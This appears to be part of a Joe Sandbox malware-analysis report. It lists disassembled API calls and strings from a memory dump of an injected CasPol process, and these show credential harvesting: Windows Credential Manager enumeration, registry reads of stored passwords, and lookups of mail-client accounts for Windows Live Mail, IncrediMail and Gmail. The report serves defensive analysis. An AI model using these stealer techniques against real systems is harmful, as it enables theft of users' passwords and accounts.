                                                                                                                                                                                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                  • API String ID: 1012775001-1343505058
                                                                                                                                                                                  • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                  • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                  • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi
                                                                                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                  • API String ID: 1439213657-1959339147
                                                                                                                                                                                  • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                  • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                                                                                  • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00444612
                                                                                                                                                                                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                  • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                  • memset.MSVCRT ref: 00444668
                                                                                                                                                                                  • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                  • memset.MSVCRT ref: 00444690
                                                                                                                                                                                  • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                  • String ID: salu
                                                                                                                                                                                  • API String ID: 3691931180-4177317985
                                                                                                                                                                                  • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                  • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA,7570CFBC), ref: 00410060
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                  • API String ID: 2449869053-232097475
                                                                                                                                                                                  • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                  • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                                  • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                  • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                    • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Salt, xrefs: 00443BA7
                                                                                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                  • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                  • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                  • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                  • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                  • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                    • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                    • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                    • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                    • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                  • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                  • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                  • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                  • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                  • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                  • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                  • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 0040FFD8
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040FFE9
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040FFFA
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041000B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041001C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                  • String ID: Creds$ps:password
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                  • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                  • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                                                    • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                    • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                    • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                  • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                                                  • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                                                  • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                  • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy
                                                                                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                  • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                    • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                    • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                    • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                  • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                  • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                  • memset.MSVCRT ref: 00410129
                                                                                                                                                                                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                    • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                  • memset.MSVCRT ref: 00410171
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                  • String ID: \systemroot
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • memset.MSVCRT ref: 0040301E
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • memset.MSVCRT ref: 0040306B
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00403083
                                                                                                                                                                                  • memset.MSVCRT ref: 004030B4
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                  • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                  • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                  • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$strlen
                                                                                                                                                                                  • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$strlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
